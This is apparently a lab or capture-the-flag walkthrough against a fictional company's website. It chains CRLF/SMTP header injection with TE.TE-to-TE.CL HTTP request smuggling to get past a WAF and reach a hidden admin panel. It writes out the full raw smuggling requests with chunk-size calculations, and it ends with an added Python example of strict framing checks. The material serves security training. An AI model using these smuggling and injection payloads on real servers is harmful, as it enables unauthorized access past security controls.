Company: SentinelFrame Solutions
Setup:
- WAF deployed to block malicious requests
- Admin panel moved from `/admin` to a concealed path
- Contact form for reaching the system administrator
- Email testing account: `attacker@evil.htb` (accessible at `/mail`)
Objective: Combine multiple HTTP attack techniques to bypass security controls and obtain sensitive information.
1. SMTP Header Injection → Discover hidden admin path
2. TE.CL via TE.TE → Bypass WAF blocking CRLF
3. Request Smuggling → Access hidden admin panel
- Navigate to website root
- Click Contact button
- Observe form fields: name, email, message
```
POST /contact HTTP/1.1
Host: <TARGET>
Content-Type: application/x-www-form-urlencoded

name=Test&email=test@gmail.com&message=Hello
```
Try injecting CRLF to add a Cc: header:
```
name=Test&email=test%40gmail.com%0d%0aCc:attacker@evil.htb&message=Hello
```
The WAF blocks requests containing CRLF characters (%0d%0a).
TE.CL via TE.TE using Substring match technique.
The WAF/proxy accepts Transfer-Encoding: asdchunked (substring contains "chunked").
Request 1 (Smuggling + SMTP Injection):
```
GET /404 HTTP/1.1
Host: <TARGET>
Content-Length: 4
Transfer-Encoding: asdchunked

f3
POST /contact HTTP/1.1
Host: <TARGET>
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

name=Test%0d%0aCc:+attacker@evil.htb%0d%0aDoesNotExist:+True&email=test@gmail.com&message=Hello+Admin

0

```
| Element | Purpose |
|---|---|
| `Transfer-Encoding: asdchunked` | Substring bypass (TE.TE) |
| `Content-Length: 4` | For TE.CL (proxy uses TE, backend uses CL) |
| `f3` (hex) | Chunk size = 243 bytes |
| `Cc: attacker@evil.htb` | SMTP header injection |
| `DoesNotExist: True` | Absorbs appended data |
| `0` | Empty chunk terminator |
Count the bytes from `POST /contact...` up to, but not including, the `0` line:
```
POST /contact HTTP/1.1\r\n
Host: <TARGET>\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 114\r\n
\r\n
name=Test%0d%0aCc:+attacker@evil.htb%0d%0aDoesNotExist:+True&email=test@gmail.com&message=Hello+Admin\r\n
\r\n
```
Total: 243 bytes = 0xf3
- Uncheck "Update Content-Length"
- Send request
http://<TARGET>/mail
From admin, revealing:
- Hidden admin panel path: `/ksu3nsj9c`
- WAF blocks external access to admin
Phase 5: Access Hidden Admin Panel
WAF blocks direct access to /ksu3nsj9c.
Use same TE.CL technique to smuggle request to admin panel.
Request 1 (Smuggling):
```
GET /404 HTTP/1.1
Host: <TARGET>
Content-Length: 4
Transfer-Encoding: asdchunked

38
GET /ksu3nsj9c HTTP/1.1
Host: <TARGET>

0

```
Request 2 (Trigger):
```
GET /404 HTTP/1.1
Host: <TARGET>
```
```
GET /ksu3nsj9c HTTP/1.1\r\n = 26 bytes
Host: <TARGET>\r\n          = ~20 bytes
\r\n                        = 2 bytes
──────────
~56 bytes = 0x38
```
- Uncheck "Update Content-Length" for Request 1
- Create Tab Group with both requests
- Set Send group in sequence (single connection)
- Send
| Request | Expected Response |
|---|---|
| Request 1 (GET /404) | 404 Not Found |
| Request 2 (GET /404) | Admin panel content! |
Request 2 receives the response to the smuggled /ksu3nsj9c request.
┌─────────────────────────────────────────────────────────────────┐
│ ATTACK CHAIN │
├─────────────────────────────────────────────────────────────────┤
│ │
│ 1. WAF blocks CRLF in direct requests │
│ ↓ │
│ 2. Use TE.TE (substring) to create TE.CL scenario │
│ ↓ │
│ 3. Smuggle SMTP Header Injection past WAF │
│ ↓ │
│ 4. Receive email copy → Learn hidden admin path │
│ ↓ │
│ 5. WAF blocks direct admin access │
│ ↓ │
│ 6. Smuggle GET request to hidden admin panel │
│ ↓ │
│ 7. Access admin content via second request's response │
│ │
└─────────────────────────────────────────────────────────────────┘
| Technique | Module Section |
|---|---|
| SMTP Header Injection | CRLF Injection |
| TE.TE Substring Match | HTTP Request Smuggling |
| TE.CL Request Smuggling | HTTP Request Smuggling |
| WAF Bypass | Request Smuggling Exploitation |
- Chain vulnerabilities - Single vuln might not work, combine them
- WAF bypass via smuggling - Hide payloads in request body
- TE.TE enables TE.CL - Obfuscation creates exploitable scenario
- Email as data channel - Use available functionality for recon
- Tab groups essential - Single connection required for smuggling
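
The whole chain depends on the front end treating `Transfer-Encoding: asdchunked` as chunked through a substring match. As an added example (not part of the original write-up; the function names and sample header sets are constructed for illustration), this puts that weak check next to a strict framing check that rejects any request two parsers could delimit differently:

```python
# Added example: function names and SAMPLES are constructed for illustration.
KNOWN_CODINGS = {"chunked", "gzip", "deflate", "compress"}

def weak_is_chunked(headers):
    """Substring match: the behaviour the write-up attributes to the WAF/proxy."""
    return any(name.lower() == "transfer-encoding" and "chunked" in value.lower()
               for name, value in headers)

def strict_framing(headers):
    """Return (decision, detail); reject anything two parsers could frame differently."""
    te, cl = [], []
    for name, value in headers:
        if name != name.strip():
            return ("reject", "whitespace around header name")
        if name.lower() == "transfer-encoding":
            te.append(value)
        elif name.lower() == "content-length":
            cl.append(value.strip())
    if te:
        codings = [c.strip().lower() for v in te for c in v.split(",")]
        if any(c not in KNOWN_CODINGS for c in codings):
            return ("reject", "unrecognised transfer coding")
        if codings[-1] != "chunked" or codings.count("chunked") != 1:
            return ("reject", "chunked must appear once, as the final coding")
        if cl:
            return ("reject", "Transfer-Encoding and Content-Length both present")
        return ("chunked", "body is chunk-delimited")
    if len(set(cl)) > 1:
        return ("reject", "conflicting Content-Length values")
    if cl and not (cl[0].isascii() and cl[0].isdigit()):
        return ("reject", "Content-Length is not a plain decimal")
    return ("content-length", cl[0]) if cl else ("no-body", "")

# Constructed header sets; "writeup" mirrors the framing headers shown on this page.
SAMPLES = {
    "writeup": [("Host", "target.example"), ("Content-Length", "4"),
                ("Transfer-Encoding", "asdchunked")],
    "chunked": [("Host", "target.example"), ("Transfer-Encoding", "chunked")],
    "both":    [("Host", "target.example"), ("Content-Length", "4"),
                ("Transfer-Encoding", "chunked")],
    "length":  [("Host", "target.example"), ("Content-Length", "27")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:8} weak={weak_is_chunked(hdrs)!s:5} strict={strict_framing(hdrs)}")
```

Rejecting requests that carry both headers is stricter than simply letting Transfer-Encoding win, and it removes the disagreement between front end and back end that TE.CL depends on.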